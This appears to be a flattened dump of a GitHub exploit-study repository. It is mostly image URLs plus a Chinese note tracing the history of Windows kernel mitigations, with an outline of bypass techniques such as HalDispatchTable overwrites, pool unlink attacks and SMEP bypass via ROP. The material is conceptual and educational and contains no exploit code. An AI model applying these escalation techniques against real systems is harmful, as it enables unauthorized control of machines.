/History/Images/heap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/heap1.png -------------------------------------------------------------------------------- /History/Images/kernel-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/kernel-stack.png -------------------------------------------------------------------------------- /History/Images/lfh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/lfh.png -------------------------------------------------------------------------------- /History/Images/listentry.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/listentry.png -------------------------------------------------------------------------------- /History/Images/mm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/mm.png -------------------------------------------------------------------------------- /History/Images/pre.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/pre.png -------------------------------------------------------------------------------- /History/Images/rand.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/rand.png -------------------------------------------------------------------------------- /History/Images/safe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/safe.png -------------------------------------------------------------------------------- /History/Images/safeseh1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/safeseh1.png -------------------------------------------------------------------------------- /History/Images/sealed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/sealed.png -------------------------------------------------------------------------------- /History/Images/sehop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/sehop.png -------------------------------------------------------------------------------- /History/Images/sehop1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/sehop1.png -------------------------------------------------------------------------------- /History/Images/shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/shellcode.png -------------------------------------------------------------------------------- /History/Images/unlink.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/unlink.png -------------------------------------------------------------------------------- /History/Images/vtg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/vtg.png -------------------------------------------------------------------------------- /History/Images/win1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win1.png -------------------------------------------------------------------------------- /History/Images/win2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win2.png -------------------------------------------------------------------------------- /History/Images/win3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win3.png -------------------------------------------------------------------------------- /History/Images/win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win7.png -------------------------------------------------------------------------------- /History/Images/win8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win8.png -------------------------------------------------------------------------------- /History/PAC/pac.md: -------------------------------------------------------------------------------- 1 | ## ref: 2 | 3 | https://hardenedlinux.github.io/gnu/toolchains/security/2017/06/13/ARM_PA.html 4 | -------------------------------------------------------------------------------- /History/PAC/slides_23.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/PAC/slides_23.pdf -------------------------------------------------------------------------------- /History/PAC/whitepaper-pointer-authentication-on-armv8-3.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/PAC/whitepaper-pointer-authentication-on-armv8-3.pdf -------------------------------------------------------------------------------- /History/Windows漏洞防护与利用发展史-内核层.md: -------------------------------------------------------------------------------- 1 | 总的来说,内核层和应用层有着诸多相似的地方,但是也有着自己的特点,比如空指针解引用漏洞,SMEP防护机制等。 2 | 3 | 有趣的是,一些相同原理的防护机制,滞后于对应的应用层比如:Safe Unlink在win7才开始加入到内核防护中,应用层的Safe unlink防护早在WinXP就加入了。 4 | 5 | 下面按照和应用层相同的思路介绍,分为劫持执行流和执行shellcode两部分。但是要注意的是: 6 | 可能不需要执行shellcode,直接提权成功,比如CVE-2014-4113在win8 x64上的利用和CVE-2015-1701的利用 7 | 8 | # 获得执行流程 9 | 10 | ## 1. 栈溢出 11 | 12 | ### 1.1 最原始利用 13 | 14 | 大量数据直至覆盖返回地址-->改写EIP,获得执行流 15 | 16 | ### 1.2 stack cookies 17 | 18 | #### 1.2.1 概念 19 | 20 | Windows XP SP2引入 21 | 类似于应用层的cookie,一个做校验的随机数 22 | 23 | #### 1.2.2 绕过方法 24 | 25 | 和应用层类似,想办法在函数返回之前触发异常 26 | 注意try catch不能捕获所有的页异常处理,在内核中引用一块无效地址会导致BSOD,所以这里有一个技巧: 27 | 28 | memcpy的时候就触发异常,不要等到函数返回的时候,或者strcat这种操作的时候 29 | 30 | ![](./Images/kernel-stack.png) 31 | 32 | #### 参考: 33 | 34 | A Guide to Kernel Exploitation Attacking the Core 35 | 36 | #### 预测cookies的值 37 | 38 | Win8 x64之前:成功率大于46%。 39 | 40 | J00ru:Windows Kernel-mode GS Cookies subverted 41 | 42 | Win8 x64之后:非常困难。 43 | 44 | 参考: 45 | 46 | mj0011,Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement 47 | 48 | ![](./Images/bypass.png) 49 | 50 | ## 2. 堆溢出 51 | ### 2.1 最原始利用 52 | 53 | 类似用户层堆,利用堆链表管理的特点,构造Write 4。 54 | 55 | ### 2.2 Write what 56 | 57 | 1.HalDispatchTable+4(常用) 58 | 59 | 2.修改其为shellcode的地址,然后在用户层调用 NtQueryIntervalProfile(2,X)触发shellcode执行。 60 | 61 | 3.Token+ PrivilegesOffset.Enabled 62 | 63 | 4.修改SeDebug权限,之后可以注入代码到系统进程中,完成提权 64 | Moritz Jodeit,Exploiting CVE-2014-4113 on Windows 8.1 65 | 66 | 5.LDT 67 | 6.KiDebugRoutine? 68 | 69 | ### 2.3 Win7 之前 70 | 71 | #### 2.3.1 安全机制 72 | 73 | 似乎没有。。。 74 | 75 | #### 2.3.2 绕过方法 76 | 77 | 主要发生在ListEntry中,在下面几种堆管理的情况下,又可能将溢出变成Write4: 78 | 79 | Unlink in merge with next 80 | 81 | ![](./Images/listentry.png) 82 | 83 | Unlink in merge with previous pool chunk 84 | 85 | ![](./Images/pre.png) 86 | 87 | Unlink in allocation from ListHeads[n] free list 88 | 89 | #### 参考: 90 | 91 | SoBeIt X’con 2005 92 | Kostya Kortchinsky SyScan 2008 93 | 94 | ### 2.4 Win7 95 | 96 | #### 2.4.1 安全机制 97 | 98 | Safe Unlink 99 | 100 | 类似应用层的Safe Unlink,图示: 101 | 102 | ![](./Images/safe.png) 103 | 104 | #### 2.4.2 绕过方法 105 | 106 | 1.ListEntry Flink Overwrite 107 | 2.Lookaside Pointer Overwrite 108 | 3.PoolIndex Overwrite 109 | 4.Quota Process Pointer Overwrite 110 | 111 | #### 参考: 112 | 113 | Tarjei Mandt BH DC 2011 114 | 115 | ### 2.5 Win8 116 | 117 | #### 2.5.1 安全机制 118 | 119 | 都是针对win7上的利用做得改进。 120 | 121 | 1.Process quota pointer encoding 122 | 2.Lookaside,delay free,and pool page cookies 123 | 3.PoolIndex bounds check 124 | 4.Additional safe unlinking checks 125 | 126 | #### 2.5.2 绕过方法 127 | 128 | 1.BlockSize Attack 129 | 2.Split Chunk Attack 130 | 3.DKOHM / Object Type Confusion(重要) 131 | 132 | ![](./Images/dkohm.png) 133 | 134 | #### 参考: 135 | 136 | Tarjei Mandt BH US 2012 137 | 138 | Zhenhua 'Eric' Liu NoSuchCon 2013 139 | 140 | Nikita Tarakanov--Exploiting Hardcore Pool Corruptions in Microsoft Windows Kernel NoSuchCon 2013 141 | 142 | Nikita Tarakanov--DATA-ONLY PWNING MICROSOFT WINDOWS KERNEL: EXPLOITATION OF KERNEL POOL OVERFLOWS ON MICROSOFT WINDOWS 8.1 ZeroNights 2014 143 | 144 | ### 2.6 总结 145 | 146 | 越来越多的pool integrity checks,针对pool metadata/mechanisms的攻击越来越困难,DKOHM是一个趋势。 147 | 148 | ## 3. 其它 149 | ### 3.1 空指针解引用 150 | 151 | #### 3.1.1 利用 152 | 153 | 这算是内核中比较特殊并且数量较大的一类漏洞了,虽然应用层也有空指针解引用漏洞,但是几乎都不能利用。而在Win8之前却是内核漏洞中很流行。 154 | 155 | 比如CVE-2014-4113、CVE-2015-0003等都是这种漏洞,形式类似: 156 | 157 | call [eax+8] // eax=0 158 | 159 | 具体可以参考这两个漏洞的利用代码,都是公开的。 160 | 161 | #### 3.1.2 防护 162 | 163 | win8 开始禁止非管理员权限的零页分配 164 | 165 | ### 3.2 UAF 166 | 167 | #### 3.2.1利用 168 | 169 | 和应用层类似,但是也有自己特殊的地方,比如神奇的WorkerFactoy 对象。 170 | 171 | 参考:0x710DDDD,CVE-2014-1767_Afd.sys_double-free_漏洞分析与利用 172 | 173 | #### 3.2.2防护 174 | 175 | 1.Isolated Pools? 176 | 2.Reference count hardening 177 | 178 | http://blogs.technet.com/b/srd/archive/2013/11.aspx 179 | 180 | ### 3.3 竞争条件 181 | 182 | 这类漏洞一直没能找到相关的PoC,所以并不了解,可以参考: 183 | 184 | http://j00ru.vexillium.org/?p=1695 185 | 186 | # 执行shellcode 187 | 188 | 大多数的漏洞都需要这一步,也有像CVE-2014-4113在win8上面的exp,利用了漏洞本身的特点,不再需要”shellcode“了。 189 | 190 | ## 1. SMEP/SMAP 191 | ### 1.1 概念 192 | 193 | SMEP:处理器cr4寄存器和PTE结合,阻止ring0去执行ring3代码(Prevents supervisor from executing code in user pages) 194 | 195 | SMAP:Supervisor Mode Access Prevention,ring0的代码不可以read/write应用层的内存。 196 | 197 | ### 1.2 绕过方法 198 | 199 | 思路类似于绕过DEP。 200 | 201 | 1.ROP 202 | 203 | ExAllocatePoolWithTag (NonPagedExec) + memcpy+jmp 204 | 205 | clear SMEP flag in cr4 206 | 207 | 参考: 208 | http://blogs.360.cn/blog/hacking-team-part5-atmfd-0day-2/ 209 | 210 | 2.Leak and Jmp 到一个RWX的内核内存地址(Artem’s Shishkin technique) 211 | 3.Set Owner flag of PTE to 0 (MI_PTE_OWNER_KERNEL) 212 | 213 | Win8之前 214 | 215 | 通过确定的对象地址,写入一些代码 216 | 但是win8 加入了 non-paged pool NX 217 | mj0011,Reversing Windows8: Interesting Features of Kernel Security 218 | 219 | ## 2. Non-paged pool NX 220 | 221 | ### 2.1 概念 222 | 223 | non-executable non-paged pool 224 | 225 | 参考 226 | 227 | https://msdn.microsoft.com/en-us/library/windows/hardware/hh920391(v=vs.85).aspx 228 | 229 | ## 3. KASLR 230 | ### 3.1 概念 231 | 232 | 微软在Win8.1之前,对这方面都是很重视,第一次是在Server2008 RTM引入的。 233 | 234 | 4 bits of entropy for drivers,5 bits for NTOS/HAL 235 | 236 | ### 3.2 防护 237 | 238 | #### 3.2.1 Win7 239 | 240 | Drivers: 6 bits on x86, 8 bits on x64 241 | 242 | #### 3.2.2 Win8 243 | 244 | Biasing of kernel segment base 245 | 246 | NTOS/HAL receive 22 bits(64-bit) and 12 bits(32-bit) 247 | 248 | Various boot regions also randomized(P0 idle stack) 249 | 250 | 限制对敏感函数的调用 251 | 252 | 如果进程运行在低完整性级别以下(保护模式或增强保护模式),那么SystemModuleInformation等相关获得内核模块基址的方法都会被阻止,这样,即使攻击者在保护模式或增强保护模式下触发了内核漏洞,由于无法获得内核基址,也很难进行进一步利用。 253 | 254 | 参考: 255 | http://blogs.360.cn/blog/fixed_three_0days_in_may/ 256 | 257 | ## 4. DEP 258 | 259 | 图解: 260 | 261 | ![](./Images/dep-kernel.png) 262 | 263 | by:会飞的猫 264 | 转载请注明:http://www.cnblogs.com/flycat-2016 265 | 266 | -------------------------------------------------------------------------------- /History/afl.md: -------------------------------------------------------------------------------- 1 | 一些需要注意的地方: 2 | 3 | ## 测试用例尽可能小 4 | 5 | ## 构造字典 6 | 7 | ## 样本不是越多越好 8 | 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | exploit study. 2 | i am moonagirl. -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120056941-521000199.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120056941-521000199.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120057535-1926957792.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120057535-1926957792.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058175-1651279641.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058175-1651279641.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058644-274645935.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058644-274645935.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059128-479937764.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059128-479937764.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059785-318854944.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059785-318854944.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100347-1097263581.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100347-1097263581.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100738-1402769642.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100738-1402769642.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120101300-47970014.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120101300-47970014.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102066-439387585.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102066-439387585.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102503-260248986.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102503-260248986.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102894-799784821.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102894-799784821.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103425-20637235.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103425-20637235.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103894-2146368649.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103894-2146368649.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104410-1243386177.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104410-1243386177.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104863-2088752860.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104863-2088752860.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105285-1813557857.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105285-1813557857.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105707-991419323.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105707-991419323.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106019-1901645584.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106019-1901645584.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106769-1978294529.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106769-1978294529.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120107425-1893723380.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120107425-1893723380.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108128-1338026729.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108128-1338026729.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108738-2074080055.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108738-2074080055.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109222-836873254.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109222-836873254.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109894-475395427.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109894-475395427.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110363-835793604.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110363-835793604.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110863-489063356.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110863-489063356.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120111488-32302803.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120111488-32302803.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/InsertCode.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/InsertCode.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/b.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/base.js.下载: -------------------------------------------------------------------------------- 1 | /** 2 | * Huawei Technologies http://www.huawei.com 3 | *(c) 